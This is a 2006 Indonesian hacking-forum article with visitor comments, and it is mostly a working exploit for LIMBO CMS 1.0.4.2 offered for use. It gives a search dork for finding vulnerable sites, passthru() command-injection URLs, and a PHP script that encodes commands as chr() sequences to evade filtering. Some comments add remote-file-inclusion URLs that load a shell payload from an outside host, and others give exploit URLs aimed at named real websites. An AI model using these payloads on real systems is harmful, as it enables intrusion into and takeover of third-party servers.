Home
Hacking
Tutorial
.NET
IT News
Lain-lain
About Us
FAQ
Penerbitan Buku

Klik untuk join milist Jasakom




 

Jasakom Community - Article
LIMBO <= 1.0.4.2 Remote Command Exploit
Date: Monday, March 20, 2006    Hits: 3543    By:  XBOX360LIVE 360live.xbox (at) gmail.com   
Gw masih newbie,lamerz, tapi mau coba2 berbagi ilmu :"> okeh deh, langsung ajah :-" .....(ya ga men? =)) =)) )
New Page 1


biasai lah, googling dulu....

inurl:"option=frontpage&itemid="

atau pake keyword yang lain, terserah gimana kreatipnya

tuh...kan...banyak....hehehehe....

contoh:
http://www.localhost/index.php?options=frontpage&itemid=passthru(id)

eh....ternyata di'execute' tuh :D
coba lagi ah,

http://www.localhost/index.php?options=frontpage&itemid=passthru(ls -al)
loh....ko ga di execute? hiks.....gimana nih.... :(( :((

hehehe....bisa men :D
lu bisa pake php script, atau bahasa pemrograman apa aja yang lu bisa.
Intinya, command yang mau di eksekusi itu masing2 karakternya
di ubah jadi code ascii, dan diantara kode itu ditambahin tanda "." (titik).
(Lah iya....kan 'target'nya kan pake php, jadi 'penggabung'nya pake "." :P )
misalnya huruf:

a = chr(97)
b = chr(98)
c = chr(99)
...
dan seterusnya.

contohnya:
ls = chr(108).chr(115)
uname = chr(117).chr(110).chr(97).chr(109).chr(101)

Binun ga lu? .... tau deh, gw aja binun neranginnya =)) =))
Oke, ini contohnya gw bikin pake php dan gw save sebagai ascii.php:


//-----Begining of File
<?php
$perintah = stripslashes($perintah);
$arrayku = preg_split('//', $perintah,-1,PREG_SPLIT_NO_EMPTY);
// kalau di php 5, ada fungsi str_split();

function addchr($n) {
$n = 'chr(' . ord($n) . ')';
return $n;
}

$hasil = implode(".",array_map("addchr",$arrayku));

echo $perintah . "<br>\n" . $hasil;
?>
//-----End of File


nah, kalo gw jalanin di local pc gw:

http://localhost/ascii.php?perintah=ls -al

Dan hasilnya:


ls -al
chr(108).chr(115).chr(32).chr(45).chr(97).chr(108)


nah, itu yang nanti kita masukin nantinya dalam fungsi passthru(), jadinya begini:

http://www.localhost/index.php?options=frontpage&itemid=passthru(chr(108).chr(115).chr(32).chr(45).chr(97).chr(108))

oopsss......ternyata di'execute'
Selanjutnya.....ya terserah :-" :-" :-"

Pencegahannya?
* Kalau lu punya akses konfigurasi php, lu bisa disable fungsi2 yang 'membahayakan',
misalnya fungsi passthru(),system(),exec() dan lain nya.
* Kalau ga punya akses konfigureasi, lu upgrade dong ke versi yang baru :-"
atau cari patch nya =)) =)) =))


# Thanks to Allah SWT
# Thanks to teman2 semua
# gw ga punya "geng" seperti #echo, #hackerlink atau yang lainnya
# jadi gw "shout" nya untuk semua aja >:D<
# Kritik dan saran, komentar, atau apapun....silahkan kontak 360live.xbox (at) gmail.com

 

 

Source: JASAKOM Information Center
 
1 2
Jasakom Community - Visitor Comment
Nama: dr.pluto   Tgl: 4/27/2006 9:07:07 AM
Komentar:
http://libiaz.net.pl//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://pluto5yc04.alkadr.com/IOS/Users/pluto5yc04.alkadr.com/Files/sikat.txt?
Nama: dr.pluto   Tgl: 4/27/2006 9:04:49 AM
Komentar:
huehuehuehue,... manual banget, tp ga papa bagus banget tu,... tp khan lebih enak pake r57shell 69 misal:http://libiaz.net.pl//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://pluto5yc04.alkadr.com/IOS/Users/pluto5yc04.alkadr.com/Fil
Nama: pendekar01   Tgl: 4/9/2006 9:38:14 PM
Komentar:
gak ngerti nih....!!
Nama: tomero   Tgl: 4/6/2006 8:39:32 AM
Komentar:
Ingat selalu Situsku yAch...
Nama: spycomhack   Tgl: 4/5/2006 11:44:46 AM
Komentar:
http://www.warungbarokah.com/web/index.php/option/frontpage/Itemid=passthru(chr(108).chr(115).chr(32).chr(45).chr(97).chr(108))
Nama: cakrawalla   Tgl: 3/31/2006 11:30:09 PM
Komentar:
Bagus tapi .......................
Nama: blzz   Tgl: 3/31/2006 5:35:25 PM
Komentar:
oalaa le' le'...!puyen aku, apa 'g bisa lebih simple lgi..?
Nama: th3sn0wbr4in   Tgl: 3/23/2006 5:31:23 AM
Komentar:
Seep..............................................BgtSeep..............................................BgtSeep..............................................BgtSeep..............................................BgtSeep.......................................
Nama: xboxlive   Tgl: 3/22/2006 9:34:55 PM
Komentar:
keyword: inurl:”option=frontpage” contoh: http://www.glenorchy.com/index.php?option=frontpage&Itemid=passthru(id) http://www.glenorchy.com/index.php?option=frontpage&Itemid=passthru(chr(108).chr(115).chr(32).chr(45).chr(97).chr(108))
Nama: kufitmex1   Tgl: 3/22/2006 6:16:16 AM
Komentar:
Saya bukan newbie ato apapun, saya cuma pengen teman-teman Bantu atasi masalah saya tentang computer. Langsung aja computer saya dalam beberapa bulan ini sering hang kemungkinan kena virus tapi saya tidak tahu virus apa. Ciri-ciri computer saya kalo disca
Nama: sarge_kecil   Tgl: 3/21/2006 10:39:47 PM
Komentar:
http://www.zone-h.org/defacements/mirror/id=3424906/
Nama: sarge_kecil   Tgl: 3/21/2006 10:33:59 PM
Komentar:
http://www.gemainsani.co.id/bt/lihat.asp
Nama: allye   Tgl: 3/21/2006 8:13:39 PM
Komentar:
walaupun msh agk binun dhertahack msh trs berfkr ehhh mlh kompinya ikutan binun, kompeeku mokong lage neeehh gmn neeh jambi
Nama: adhie1986   Tgl: 3/21/2006 9:19:49 AM
Komentar:
err....gwe gak ngerti, jelasin lebih dalem dunk!!! kirim ke adhie1986@yahoo.com plz...gwe tunggu!!!
Nama: XdikaX   Tgl: 3/21/2006 9:15:32 AM
Komentar:
xixixixixixi :D~ aderrrrrrrr........ ngisi absent dolo
Nama: sempranx   Tgl: 3/21/2006 5:43:53 AM
Komentar:
Ehh accountku masih hidup toh....
Nama: bro_adee   Tgl: 3/21/2006 1:09:59 AM
Komentar:
ada yang tau keygen telkomsel ngga? pulsa gw abiz nihh
Nama: MegacybeR   Tgl: 3/21/2006 12:55:26 AM
Komentar:
`bolu.... bolu....... sapa nyang mo bli bolu............. murah bolunya Rp.500/3 biji... sapa nyan mo bli....... boluuuuuuuuuuuuuuuuu.......................
Nama: plcrew   Tgl: 3/20/2006 11:22:28 PM
Komentar:
http://www.bluesfeelings.com/modules/AllMyGuests/plcrew.html
Nama: b1g_r4t   Tgl: 3/20/2006 11:05:23 PM
Komentar:
zzzzzzzzzzzzz
1 2

 

© Copyright by Jasakom 2005 All Right Reserved

User Id: *

Password:
* Required Field
User Baru ? Klik di sini
Lupa Password ?
Keyword :
 

Click here to join jasakomdotnet
Klik di sini untuk Join jasakomdotnet




Informasi disini digunakan untuk tujuan pendidikan, Jasakom tidak bertanggung jawab untuk penyalahgunaan informasi yang ada pada web ini. Gunakan segala bentuk informasi disini secara bijak untuk melindungi diri anda sendiri agar  tidak  menjadi korban internet.